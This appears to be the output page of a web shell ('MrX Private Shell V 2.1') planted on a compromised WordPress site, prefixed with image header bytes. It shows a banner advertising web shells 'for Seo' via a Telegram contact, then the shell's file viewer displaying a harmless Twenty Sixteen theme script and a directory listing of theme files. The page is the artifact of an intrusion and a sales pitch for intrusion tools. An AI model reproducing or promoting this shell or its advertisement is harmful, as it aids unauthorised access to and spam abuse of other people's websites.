����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* Twenty Sixteen keyboard support for image navigation.
*/
( function( $ ) {
$( document ).on( 'keydown.twentysixteen', function( e ) {
var url = false;
// Left arrow key code.
if ( 37 === e.which ) {
url = $( '.nav-previous a' ).attr( 'href' );
// Right arrow key code.
} else if ( 39 === e.which ) {
url = $( '.nav-next a' ).attr( 'href' );
// Other key code.
} else {
return;
}
if ( url && ! $( 'textarea, input' ).is( ':focus' ) ) {
window.location = url;
}
} );
} )( jQuery );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| color-scheme-control.js | File | 2.88 KB | 0644 |
|
| customize-preview.js | File | 1.04 KB | 0644 |
|
| functions.js | File | 7.17 KB | 0644 |
|
| html5.js | File | 10.09 KB | 0644 |
|
| jquery.min.js | File | 82.3 KB | 0644 |
|
| keyboard-image-navigation.js | File | 527 B | 0644 |
|
| masonry.pkgd.min.js | File | 23.59 KB | 0644 |
|
| owl.carousel.js | File | 83.37 KB | 0644 |
|
| scripts.js | File | 1.06 KB | 0644 |
|
| skip-link-focus-fix.js | File | 1.03 KB | 0644 |
|
| widget.js | File | 763 B | 0644 |
|
| wow.min.js | File | 8.24 KB | 0644 |
|